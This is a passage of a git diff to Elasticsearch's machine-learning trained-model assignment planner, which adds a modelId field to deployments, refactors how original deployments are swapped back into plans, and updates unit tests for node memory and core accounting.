planKeepingOneAllocationOnCurrentAssignments; } return bestPlan; } @@ -115,11 +137,12 @@ private AssignmentPlan solveAllocatingAtLeastOnceModelsThatWerePreviouslyAllocat .map( m -> new AssignmentPlan.Deployment( m.deploymentId(), + m.modelId(), m.memoryBytes(), 1, m.threadsPerAllocation(), // don't rely on the current allocation - new HashMap<>(), + Map.of(), m.maxAssignedAllocations(), m.getAdaptiveAllocationsSettings(), m.perDeploymentMemoryBytes(), @@ -148,6 +171,7 @@ private AssignmentPlan solveAllocatingAtLeastOnceModelsThatWerePreviouslyAllocat : Map.of(); return new AssignmentPlan.Deployment( m.deploymentId(), + m.modelId(), m.memoryBytes(), m.allocations(), m.threadsPerAllocation(), diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/RandomizedAssignmentRounding.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/RandomizedAssignmentRounding.java index 81696cd20d922..8bdc99998a0c2 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/RandomizedAssignmentRounding.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/RandomizedAssignmentRounding.java @@ -310,6 +310,8 @@ private void unassignOversizedModels(Node n) { private AssignmentPlan toPlan() { AssignmentPlan.Builder builder = AssignmentPlan.builder(nodes, deployments); for (Map.Entry, Integer> assignment : tryAssigningRemainingCores().entrySet()) { + // TODO (#101612) The model should be assigned to the node only when it is possible. This means, that canAssign should be + // integrated into the assignModelToNode. if (builder.canAssign(assignment.getKey().v1(), assignment.getKey().v2(), assignment.getValue())) { builder.assignModelToNode(assignment.getKey().v1(), assignment.getKey().v2(), assignment.getValue()); } diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlanner.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlanner.java index c5b750f91014f..64cd40fdc537d 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlanner.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlanner.java @@ -127,6 +127,7 @@ private AssignmentPlan computeZonePlan( d -> new AssignmentPlan.Deployment( // replace each deployment with a new deployment d.deploymentId(), + d.modelId(), d.memoryBytes(), deploymentIdToTargetAllocationsPerZone.get(d.deploymentId()), d.threadsPerAllocation(), @@ -163,6 +164,7 @@ private AssignmentPlan computePlanAcrossAllNodes(List plans) { .map( d -> new AssignmentPlan.Deployment( d.deploymentId(), + d.modelId(), d.memoryBytes(), d.allocations(), d.threadsPerAllocation(), @@ -180,30 +182,39 @@ private AssignmentPlan computePlanAcrossAllNodes(List plans) { List planDeployments = preserveAllAllocations.modelsPreservingAllocations(); AssignmentPlan plan = new LinearProgrammingPlanSolver(planNodes, planDeployments).solvePlan(false); plan = preserveAllAllocations.mergePreservedAllocations(plan); - return swapOriginalModelsInPlan(plan, allNodes, modelsAccountingPlans); + return swapOriginalDeploymentsInPlan(plan, allNodes, modelsAccountingPlans); } - private AssignmentPlan swapOriginalModelsInPlan( + /** + * The method is responsible for reconstructing an AssignmentPlan + * by replacing the deployments and nodes in the given plan with their original counterparts. + * This ensures that the final plan uses the original objects while preserving the assignments + * and memory accounting from the input plan. + * + * @param plan AssignmentPlan to reconstruct with original models and nodes + * @param allNodes List of all nodes in the system, used to find original nodes + * @param planDeployments List of deployments in the plan, not the original deployments + * @return final plan with original models and nodes swapped in + */ + private AssignmentPlan swapOriginalDeploymentsInPlan( AssignmentPlan plan, List allNodes, List planDeployments ) { - final Map originalModelById = deployments.stream() + final Map originalDeploymentsById = deployments.stream() .collect(Collectors.toMap(AssignmentPlan.Deployment::deploymentId, Function.identity())); final Map originalNodeById = allNodes.stream().collect(Collectors.toMap(Node::id, Function.identity())); - AssignmentPlan.Builder planBuilder = AssignmentPlan.builder(allNodes, deployments); - for (AssignmentPlan.Deployment m : planDeployments) { - AssignmentPlan.Deployment originalDeployment = originalModelById.get(m.deploymentId()); - Map nodeAssignments = plan.assignments(m).orElse(Map.of()); + AssignmentPlan.Builder finalPlanBuilder = AssignmentPlan.builder(allNodes, deployments); + + for (AssignmentPlan.Deployment planDeployment : planDeployments) { + AssignmentPlan.Deployment originalDeployment = originalDeploymentsById.get(planDeployment.deploymentId()); + Map nodeAssignments = plan.assignments(planDeployment).orElse(Map.of()); for (Map.Entry assignment : nodeAssignments.entrySet()) { Node originalNode = originalNodeById.get(assignment.getKey().id()); - planBuilder.assignModelToNode(originalDeployment, originalNode, assignment.getValue()); - // As the node has all its available memory we need to manually account memory of models with - // current allocations. - planBuilder.accountMemory(originalDeployment, originalNode); + finalPlanBuilder.assignModelToNode(originalDeployment, originalNode, assignment.getValue()); } } - return planBuilder.build(); + return finalPlanBuilder.build(); } private Map> mergeAllocationsByNodeIdByDeploymentId(List plans) { diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/MlSingleNodeTestCase.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/MlSingleNodeTestCase.java index 8898cac495706..c8c78e13f5b09 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/MlSingleNodeTestCase.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/MlSingleNodeTestCase.java @@ -121,11 +121,7 @@ public void tearDown() throws Exception { protected void waitForMlTemplates() throws Exception { // block until the templates are installed - ClusterServiceUtils.awaitClusterState( - logger, - MachineLearning::criticalTemplatesInstalled, - getInstanceFromNode(ClusterService.class) - ); + ClusterServiceUtils.awaitClusterState(MachineLearning::criticalTemplatesInstalled, getInstanceFromNode(ClusterService.class)); } protected void blockingCall(Consumer> function, AtomicReference response, AtomicReference error) diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterServiceTests.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterServiceTests.java index 31260403e5d92..059a8c573e039 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterServiceTests.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterServiceTests.java @@ -208,7 +208,6 @@ public void testClusterChanged_GivenNodesAdded_ThenLogMlNodeHeterogeneityCalled( TrainedModelAssignmentClusterService serviceSpy = spy(createClusterService(randomInt(5))); doNothing().when(serviceSpy).logMlNodeHeterogeneity(); doReturn(false).when(serviceSpy).eventStateHasGlobalBlockStateNotRecoveredBlock(any()); - doReturn(false).when(serviceSpy).eventStateMinTransportVersionIsBeforeDistributedModelAllocationTransportVersion(any()); ClusterChangedEvent mockNodesAddedEvent = mock(ClusterChangedEvent.class); ClusterState mockState = mock(ClusterState.class); diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancerTests.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancerTests.java index a2b321a332ae1..b873493100798 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancerTests.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancerTests.java @@ -21,6 +21,7 @@ import org.elasticsearch.xpack.core.ml.inference.assignment.TrainedModelAssignment; import org.elasticsearch.xpack.core.ml.inference.assignment.TrainedModelAssignmentMetadata; import org.elasticsearch.xpack.ml.MachineLearning; +import org.elasticsearch.xpack.ml.inference.assignment.planning.AssignmentPlan; import org.elasticsearch.xpack.ml.job.NodeLoad; import java.util.ArrayList; @@ -28,6 +29,8 @@ import java.util.List; import java.util.Map; import java.util.Optional; +import java.util.function.Function; +import java.util.stream.Collectors; import static org.hamcrest.Matchers.aMapWithSize; import static org.hamcrest.Matchers.anEmptyMap; @@ -1127,6 +1130,74 @@ public void testRebalance_GivenFirstModelToAdd_GivenScalingProcessorSetting() { assertThat(assignment.getReason().isPresent(), is(false)); } + public void testCopyAssignments() { + // Create test nodes + AssignmentPlan.Node node1 = new AssignmentPlan.Node("node-1", ByteSizeValue.ofGb(1).getBytes(), 4); + AssignmentPlan.Node node2 = new AssignmentPlan.Node("node-2", ByteSizeValue.ofGb(1).getBytes(), 8); + List nodes = List.of(node1, node2); + + // Create test deployments + AssignmentPlan.Deployment deployment1 = new AssignmentPlan.Deployment( + "deployment-1", + "model-1", + ByteSizeValue.ofMb(100).getBytes(), + 2, + 1, + Map.of(), + 0, + null, + Priority.NORMAL, + 0, + 0 + ); + AssignmentPlan.Deployment deployment2 = new AssignmentPlan.Deployment( + "deployment-2", + "model-2", + ByteSizeValue.ofMb(100).getBytes(), + 1, + 2, + Map.of(), + 0, + null, + Priority.LOW, + 0, + 0 + ); + List deployments = List.of(deployment1, deployment2); + + // Create source plan and assign models to nodes + AssignmentPlan.Builder sourceBuilder = AssignmentPlan.builder(nodes, deployments); + sourceBuilder.assignModelToNode(deployment1, node1, 1); + sourceBuilder.assignModelToNode(deployment1, node2, 1); + sourceBuilder.assignModelToNode(deployment2, node2, 1); + AssignmentPlan source = sourceBuilder.build(); + + // Create destination plan + AssignmentPlan.Builder dest = AssignmentPlan.builder(nodes, deployments); + + // Create map of node IDs to original nodes + Map originalNodeById = nodes.stream() + .collect(Collectors.toMap(AssignmentPlan.Node::id, Function.identity())); + + // Call copyAssignments + TrainedModelAssignmentRebalancer.copyAssignments(source, dest, originalNodeById); + + // Build the destination plan + AssignmentPlan result = dest.build(); + + // Verify assignments + Optional> deployment1Assignments = result.assignments(deployment1); + assertThat(deployment1Assignments.isPresent(), is(true)); + assertThat(deployment1Assignments.get().size(), equalTo(2)); + assertThat(deployment1Assignments.get().get(node1), equalTo(1)); + assertThat(deployment1Assignments.get().get(node2), equalTo(1)); + + Optional> deployment2Assignments = result.assignments(deployment2); + assertThat(deployment2Assignments.isPresent(), is(true)); + assertThat(deployment2Assignments.get().size(), equalTo(1)); + assertThat(deployment2Assignments.get().get(node2), equalTo(1)); + } + private static StartTrainedModelDeploymentAction.TaskParams lowPriorityParams(String deploymentId, long modelSize) { return lowPriorityParams(deploymentId, deploymentId, modelSize); } diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanTests.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanTests.java index 3f93c3431d891..c7f166a19bb69 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanTests.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanTests.java @@ -16,6 +16,7 @@ import java.util.Map; import static org.hamcrest.Matchers.contains; +import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThan; import static org.hamcrest.Matchers.is; @@ -25,14 +26,14 @@ public class AssignmentPlanTests extends ESTestCase { public void testBuilderCtor_GivenDuplicateNode() { Node n = new Node("n_1", 100, 4); - AssignmentPlan.Deployment m = new AssignmentPlan.Deployment("m_1", 40, 1, 2, Map.of(), 0, null, 0, 0); + AssignmentPlan.Deployment m = new AssignmentPlan.Deployment("m_1", "m_1", 40, 1, 2, Map.of(), 0, null, 0, 0); expectThrows(IllegalArgumentException.class, () -> AssignmentPlan.builder(List.of(n, n), List.of(m))); } public void testBuilderCtor_GivenDuplicateModel() { Node n = new Node("n_1", 100, 4); - Deployment m = new AssignmentPlan.Deployment("m_1", 40, 1, 2, Map.of(), 0, null, 0, 0); + Deployment m = new AssignmentPlan.Deployment("m_1", "m_1", 40, 1, 2, Map.of(), 0, null, 0, 0); expectThrows(IllegalArgumentException.class, () -> AssignmentPlan.builder(List.of(n), List.of(m, m))); } @@ -42,6 +43,7 @@ public void testAssignModelToNode_GivenNoPreviousAssignment() { { // old memory format AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(40).getBytes(), 1, @@ -75,6 +77,7 @@ public void testAssignModelToNode_GivenNoPreviousAssignment() { } { // new memory format AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(20).getBytes(), 1, @@ -112,6 +115,7 @@ public void testAssignModelToNode_GivenNewPlanSatisfiesCurrentAssignment() { Node n = new Node("n_1", ByteSizeValue.ofMb(350).getBytes(), 4); { // old memory format AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -128,7 +132,7 @@ public void testAssignModelToNode_GivenNewPlanSatisfiesCurrentAssignment() { builder.assignModelToNode(m, n, 1); assertThat(builder.getRemainingCores(n), equalTo(2)); - assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(350).getBytes())); + assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(50).getBytes())); assertThat(builder.getRemainingAllocations(m), equalTo(1)); assertThat(builder.getRemainingThreads(m), equalTo(2)); @@ -140,6 +144,7 @@ public void testAssignModelToNode_GivenNewPlanSatisfiesCurrentAssignment() { } { // new memory format AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(25).getBytes(), 2, @@ -156,7 +161,7 @@ public void testAssignModelToNode_GivenNewPlanSatisfiesCurrentAssignment() { builder.assignModelToNode(m, n, 1); assertThat(builder.getRemainingCores(n), equalTo(2)); - assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(325).getBytes())); + assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(0).getBytes())); assertThat(builder.getRemainingAllocations(m), equalTo(1)); assertThat(builder.getRemainingThreads(m), equalTo(2)); @@ -173,14 +178,16 @@ public void testAssignModelToNode_GivenNewPlanDoesNotSatisfyCurrentAssignment() Node n = new Node("n_1", ByteSizeValue.ofMb(300).getBytes(), 4); { // old memory format - Deployment m = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 2, Map.of("n_1", 2), 0, null, 0, 0); + Deployment m = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 2, Map.of("n_1", 2), 0, null, 0, 0); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); builder.assignModelToNode(m, n, 1); assertThat(builder.getRemainingCores(n), equalTo(2)); - assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(300).getBytes())); + // Since perDeployment memory is not specified, we compute the base memory usage. + // The remaining memory is 300MB - (240 MB + 2*30 MB) = 0MB + assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(0).getBytes())); assertThat(builder.getRemainingAllocations(m), equalTo(1)); assertThat(builder.getRemainingThreads(m), equalTo(2)); @@ -193,6 +200,7 @@ public void testAssignModelToNode_GivenNewPlanDoesNotSatisfyCurrentAssignment() { // new memory format Deployment m = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(25).getBytes(), 2, @@ -209,7 +217,11 @@ public void testAssignModelToNode_GivenNewPlanDoesNotSatisfyCurrentAssignment() builder.assignModelToNode(m, n, 1); assertThat(builder.getRemainingCores(n), equalTo(2)); - assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(275).getBytes())); + // base memory: 240+2*25 = 290MB + // since perDeployment memory is specified, we compute the new memory format usage: + // 250 (perDeployment) + 1*25 (perAllocation) + 25 (modelDefinition) = 300MB + // Then we take the maximum of 290 and 300, which is 300MB + assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(0).getBytes())); assertThat(builder.getRemainingAllocations(m), equalTo(1)); assertThat(builder.getRemainingThreads(m), equalTo(2)); @@ -223,7 +235,7 @@ public void testAssignModelToNode_GivenNewPlanDoesNotSatisfyCurrentAssignment() public void testAssignModelToNode_GivenPreviouslyUnassignedModelDoesNotFit() { Node n = new Node("n_1", ByteSizeValue.ofMb(340 - 1).getBytes(), 4); - Deployment m = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(50).getBytes(), 2, 2, Map.of(), 0, null, 0, 0); + Deployment m = new AssignmentPlan.Deployment("m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 2, 2, Map.of(), 0, null, 0, 0); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); Exception e = expectThrows(IllegalArgumentException.class, () -> builder.assignModelToNode(m, n, 1)); @@ -235,6 +247,7 @@ public void testAssignModelToNode_GivenPreviouslyAssignedModelDoesNotFit() { { // old memory format Node n = new Node("n_1", ByteSizeValue.ofMb(340 - 1).getBytes(), 4); AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 2, @@ -248,16 +261,13 @@ public void testAssignModelToNode_GivenPreviouslyAssignedModelDoesNotFit() { AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); - builder.assignModelToNode(m, n, 2); - AssignmentPlan plan = builder.build(); - - assertThat(plan.deployments(), contains(m)); - assertThat(plan.satisfiesCurrentAssignments(), is(true)); - assertThat(plan.assignments(m).get(), equalTo(Map.of(n, 2))); + Exception e = expectThrows(IllegalArgumentException.class, () -> builder.assignModelToNode(m, n, 2)); + assertThat(e.getMessage(), containsString("not enough memory on node")); } { // new memory format Node n = new Node("n_1", ByteSizeValue.ofMb(340 - 1).getBytes(), 4); AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -271,18 +281,14 @@ public void testAssignModelToNode_GivenPreviouslyAssignedModelDoesNotFit() { AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); - builder.assignModelToNode(m, n, 2); - AssignmentPlan plan = builder.build(); - - assertThat(plan.deployments(), contains(m)); - assertThat(plan.satisfiesCurrentAssignments(), is(true)); - assertThat(plan.assignments(m).get(), equalTo(Map.of(n, 2))); + Exception e = expectThrows(IllegalArgumentException.class, () -> builder.assignModelToNode(m, n, 2)); + assertThat(e.getMessage(), containsString("not enough memory on node")); } } public void testAssignModelToNode_GivenNotEnoughCores_AndSingleThreadPerAllocation() { Node n = new Node("n_1", ByteSizeValue.ofMb(500).getBytes(), 4); - Deployment m = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(100).getBytes(), 5, 1, Map.of(), 0, null, 0, 0); + Deployment m = new AssignmentPlan.Deployment("m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 5, 1, Map.of(), 0, null, 0, 0); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); Exception e = expectThrows(IllegalArgumentException.class, () -> builder.assignModelToNode(m, n, 5)); @@ -296,6 +302,7 @@ public void testAssignModelToNode_GivenNotEnoughCores_AndSingleThreadPerAllocati public void testAssignModelToNode_GivenNotEnoughCores_AndMultipleThreadsPerAllocation() { Node n = new Node("n_1", ByteSizeValue.ofMb(500).getBytes(), 5); AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 3, @@ -319,6 +326,7 @@ public void testAssignModelToNode_GivenNotEnoughCores_AndMultipleThreadsPerAlloc public void testAssignModelToNode_GivenSameModelAssignedTwice() { Node n = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 8); Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 4, @@ -362,7 +370,7 @@ public void testAssignModelToNode_GivenSameModelAssignedTwice() { public void testCanAssign_GivenPreviouslyUnassignedModelDoesNotFit() { Node n = new Node("n_1", 100, 5); - AssignmentPlan.Deployment m = new AssignmentPlan.Deployment("m_1", 101, 1, 1, Map.of(), 0, null, 0, 0); + AssignmentPlan.Deployment m = new AssignmentPlan.Deployment("m_1", "m_1", 101, 1, 1, Map.of(), 0, null, 0, 0); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); @@ -373,13 +381,16 @@ public void testCanAssign_GivenPreviouslyAssignedModelDoesNotFit() { Node n = new Node("n_1", ByteSizeValue.ofMb(300).getBytes(), 5); { // old memory format - Deployment m = new Deployment("m_1", ByteSizeValue.ofMb(31).getBytes(), 1, 1, Map.of("n_1", 1), 0, null, 0, 0); + Deployment m = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(31).getBytes(), 1, 1, Map.of("n_1", 1), 0, null, 0, 0); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); - assertThat(builder.canAssign(m, n, 1), is(true)); + // 240 + 2*31 = 302MB, this doesn't fit in 300MB. We don't care that the deployment is currently allocated since + // only previous assignments should be considered + assertThat(builder.canAssign(m, n, 1), is(false)); } { // new memory format Deployment m = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(25).getBytes(), 1, @@ -387,17 +398,22 @@ public void testCanAssign_GivenPreviouslyAssignedModelDoesNotFit() { Map.of("n_1", 1), 0, null, - ByteSizeValue.ofMb(300).getBytes(), + ByteSizeValue.ofMb(265).getBytes(), ByteSizeValue.ofMb(10).getBytes() ); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); + // 265 + 1*10 + 25 = 300MB, this doesn't fit in 300MB. We don't care that the deployment is currently allocated since assertThat(builder.canAssign(m, n, 1), is(true)); + builder.assignModelToNode(m, n, 1); + // After assignment, no more memory is available + assertThat(builder.canAssign(m, n, 1), is(false)); } } public void testCanAssign_GivenEnoughMemory() { Node n = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 5); AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 3, @@ -422,13 +438,25 @@ public void testCompareTo_GivenDifferenceInPreviousAssignments() { Node n = new Node("n_1", ByteSizeValue.ofMb(300).getBytes(), 5); { - Deployment m = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 3, 2, Map.of("n_1", 2), 0, null, 0, 0); + Deployment m = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(30).getBytes(), + 3, + 2, + Map.of("n_1", 2), + 0, + null, + 0, + 0 + ); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); builder.assignModelToNode(m, n, 2); planSatisfyingPreviousAssignments = builder.build(); } { AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 3, @@ -453,6 +481,7 @@ public void testCompareTo_GivenDifferenceInAllocations() { AssignmentPlan planWithFewerAllocations; Node n = new Node("n_1", ByteSizeValue.ofMb(300).getBytes(), 5); AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 3, @@ -485,13 +514,25 @@ public void testCompareTo_GivenDifferenceInMemory() { Node n = new Node("n_1", ByteSizeValue.ofMb(300).getBytes(), 5); { - Deployment m = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 3, 2, Map.of("n_1", 1), 0, null, 0, 0); + Deployment m = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(30).getBytes(), + 3, + 2, + Map.of("n_1", 1), + 0, + null, + 0, + 0 + ); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); builder.assignModelToNode(m, n, 2); planUsingMoreMemory = builder.build(); } { AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(29).getBytes(), 3, @@ -517,6 +558,7 @@ public void testSatisfiesAllModels_GivenAllDeploymentsAreSatisfied() { { // old memory format AssignmentPlan.Deployment deployment1 = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 1, @@ -528,6 +570,7 @@ public void testSatisfiesAllModels_GivenAllDeploymentsAreSatisfied() { 0 ); AssignmentPlan.Deployment deployment2 = new AssignmentPlan.Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -539,6 +582,7 @@ public void testSatisfiesAllModels_GivenAllDeploymentsAreSatisfied() { 0 ); AssignmentPlan.Deployment deployment3 = new AssignmentPlan.Deployment( + "m_3", "m_3", ByteSizeValue.ofMb(20).getBytes(), 4, @@ -560,6 +604,7 @@ public void testSatisfiesAllModels_GivenAllDeploymentsAreSatisfied() { { // new memory format AssignmentPlan.Deployment deployment1 = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 1, @@ -571,6 +616,7 @@ public void testSatisfiesAllModels_GivenAllDeploymentsAreSatisfied() { ByteSizeValue.ofMb(10).getBytes() ); AssignmentPlan.Deployment deployment2 = new AssignmentPlan.Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -582,6 +628,7 @@ public void testSatisfiesAllModels_GivenAllDeploymentsAreSatisfied() { ByteSizeValue.ofMb(10).getBytes() ); AssignmentPlan.Deployment deployment3 = new AssignmentPlan.Deployment( + "m_3", "m_3", ByteSizeValue.ofMb(20).getBytes(), 4, @@ -605,9 +652,9 @@ public void testSatisfiesAllModels_GivenAllDeploymentsAreSatisfied() { public void testSatisfiesAllDeployments_GivenOneModelHasOneAllocationLess() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 4); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(20).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(20).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); AssignmentPlan plan = AssignmentPlan.builder(List.of(node1, node2), List.of(deployment1, deployment2, deployment3)) .assignModelToNode(deployment1, node1, 1) .assignModelToNode(deployment2, node2, 2) @@ -620,9 +667,9 @@ public void testSatisfiesAllDeployments_GivenOneModelHasOneAllocationLess() { public void testArePreviouslyAssignedDeploymentsAssigned_GivenTrue() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 4); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 3, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 4, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(20).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 3, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 4, null, 0, 0); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(20).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); AssignmentPlan plan = AssignmentPlan.builder(List.of(node1, node2), List.of(deployment1, deployment2, deployment3)) .assignModelToNode(deployment1, node1, 1) .assignModelToNode(deployment2, node2, 1) @@ -633,8 +680,8 @@ public void testArePreviouslyAssignedDeploymentsAssigned_GivenTrue() { public void testArePreviouslyAssignedDeploymentsAssigned_GivenFalse() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 4); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 3, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 4, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 3, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 4, null, 0, 0); AssignmentPlan plan = AssignmentPlan.builder(List.of(node1, node2), List.of(deployment1, deployment2)) .assignModelToNode(deployment1, node1, 1) .build(); @@ -644,8 +691,20 @@ public void testArePreviouslyAssignedDeploymentsAssigned_GivenFalse() { public void testCountPreviouslyAssignedThatAreStillAssigned() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 4); - Deployment deployment1 = new 